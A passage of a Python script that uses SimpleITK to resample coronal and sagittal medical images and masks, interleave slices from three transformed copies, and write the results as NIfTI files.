moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_a3.nii.gz")
################################################################################################################################################
## ---------------------------------------------------- Coronal Image ----------------------------------------------------------------------- ##
################################################################################################################################################
newSpacing = (1.5,3,1.5)
shiftOrigin = (0,0,0)
moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_co_sitk, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_co_mask, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
end = moving_image0.shape[0]
sitk.WriteImage(moving_image_sitk0,'moving_img_c1.nii.gz')
# sample slices -------------------------------------------------------------------------
# coronal-1 (c1) [0,1,2]
moving_mask = moving_mask0.copy()
moving_mask[range(0,end,3)] = moving_mask0[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask1[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask2[range(2,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_c1.nii.gz")
moving_image = moving_image0.copy()
moving_image[range(0,end,3)] = moving_image0[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image1[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image2[range(2,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_c1.nii.gz")
# # coronal-2 (c2) [2,0,1]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_co_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_co_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[1]
moving_mask = moving_mask0.copy()
moving_mask[range(2,end,3)] = moving_mask0[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask1[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask2[range(1,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_c2.nii.gz")
moving_image = moving_image0.copy()
moving_image[range(2,end,3)] = moving_image0[range(2,end,3)]
moving_image[range(0,end,3)] = moving_image1[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image2[range(1,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_c2.nii.gz")
# # coronal-3 (c3) [1,2,0]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_co_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_co_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[1]
moving_mask = moving_mask0.copy()
moving_mask[range(1,end,3)] = moving_mask0[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask1[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask2[range(0,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_c3.nii.gz")
moving_image = moving_image0.copy()
moving_image[range(1,end,3)] = moving_image0[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image1[range(2,end,3)]
moving_image[range(0,end,3)] = moving_image2[range(0,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_c3.nii.gz")
################################################################################################################################################
## ---------------------------------------------------- Sagittal Image ---------------------------------------------------------------------- ##
################################################################################################################################################
newSpacing = (3,1.5,1.5)
shiftOrigin = (0,0,0)
moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_sa_sitk, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_sa_mask, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
end = moving_image0.shape[0]
sitk.WriteImage(moving_image_sitk0,'moving_img_s1.nii.gz')
# sample slices -------------------------------------------------------------------------
# sagittal-1 (s1) [0,1,2]
moving_mask = moving_mask0.copy()
moving_mask[range(0,end,3)] = moving_mask0[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask1[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask2[range(2,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_s1.nii.gz")
moving_image = moving_image0.copy()
moving_image[range(0,end,3)] = moving_image0[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image1[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image2[range(2,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_s1.nii.gz")
# # sagittal-2 (s2) [2,0,1]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_sa_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_sa_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[2]
moving_mask = moving_mask0.copy()
moving_mask[range(2,end,3)] = moving_mask0[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask1[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask2[range(1,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_s2.nii.gz")
moving_image = moving_image0.copy()
moving_image[range(2,end,3)] = moving_image0[range(2,end,3)]
moving_image[range(0,end,3)] = moving_image1[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image2[range(1,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_s2.nii.gz")
# # sagittal-3 (s3) [1,2,0]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_sa_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_sa_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[2]
moving_mask = moving_mask0.copy()
moving_mask[range(1,end,3)] = moving_mask0[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask1[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask2[range(0,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_s3.nii.gz")
moving_image = moving_image0.copy()
moving_image[range(1,end,3)] = moving_image0[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image1[range(2,end,3)]
moving_image[range(0,end,3)] = moving_image2[range(0,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_s3.nii.gz")
if __name__ == '__main__':
main()